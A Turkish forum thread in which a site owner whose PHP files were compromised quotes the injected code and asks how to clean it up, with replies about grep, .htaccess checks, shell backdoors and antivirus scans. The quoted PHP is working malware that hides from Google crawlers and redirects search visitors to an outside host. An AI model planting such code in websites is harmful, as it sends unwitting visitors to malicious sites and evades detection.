Çok güzel Hacklendim. Her php kodunun arasına bir şey eklemişler :(

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (stristr($uag,"MSIE")){
            preg_match ("/msie ([0-9.]+)/i",$uag,$mv);
            if (isset($mv[1])){
                $mv=str_replace(".","",$mv[1]);
            }
        }
        if(!preg_match("/^66\.249\./",$_SERVER['REMOTE_ADDR'])){
            if (stristr($uag,"MSIE") and $mv>=90){
                if (stristr($referer,"yahoo.") or stristr($referer,"bing.") or preg_match ("/google\.(.*?)\/url\?sa/",$referer)) {
                    if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){
                        header("Location: http://gsbncm.epac.to/");
                        exit();
                    }
                }
            }
        }
    }
}

kodda yazan bu. gerisini buradak cıkartısınız sanırım.

kolay gelsin

Dizininizde kodunu aratın, çıkan sonuçları temizleyin. Daha sonrasında dizini anti virüsten geçirin veya host sağlayıcınızdan destek alın.

Hepsini temizlemek çözüm olmayabilir.
Hepsini temizledikten sonra .htaccess dosyasını kontrol edin muhakkak onda da vardır kod.
Ayrıca shell yedeklemiş olabilirler dosyaları kontrol etmekte yarar var size tanıdık gelmeyen dosyaları silin

Bu virüs ve shell taramasını nasıl yapabilirim ? bilginiz var mı

shell taraması yapan toollar vardir açıkcası ben hic bilmiyorum. eger bu kodların hepsini bulup temizlemek istiyorsanız ve ssh erişiminiz varsa anahtar kelimeleriniz. grep, sed

kodları temizledim. Bu gün yine eklenmiş.

gel halledelim. Alp

tamam

Alp Arkadaşımın Sunucusunda Maldet Taraması Temiz çıktı. Arkadaşlar

Arkadaşımın yedeğini indirip. ESET Endpoint 'ile taratdıgımda

Base64 iframe Virüsü ortaga çıktı. Bu Tema dosyasında



Kodları Silsem Yeter li olurmu ? yada Nasıl yol izlemeliyiz ?

Saygılar